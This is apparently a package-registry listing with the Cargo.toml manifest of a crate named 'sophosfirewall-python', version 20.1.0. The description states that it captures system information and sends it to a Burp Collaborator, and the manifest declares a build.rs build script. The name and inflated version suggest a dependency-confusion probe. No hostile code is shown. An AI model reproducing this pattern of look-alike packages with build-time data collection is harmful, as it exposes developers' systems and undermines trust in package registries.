sophosfirewall-python 20.1.0

A package that captures system information and sends it to a Burp Collaborator.
1
2
3
4
5
6
7
8
9
10
11
12
13
[package]
name = "sophosfirewall-python"
version = "20.1.0"
authors = ["Your Name <your.email@example.com>"]
edition = "2018"
build = "build.rs"
description = "A package that captures system information and sends it to a Burp Collaborator."
license = "MIT"
repository = "https://github.com/yourusername/sophosfirewall-python"
homepage = "https://github.com/yourusername/sophosfirewall-python"
documentation = "https://docs.rs/sophosfirewall-python"

[dependencies]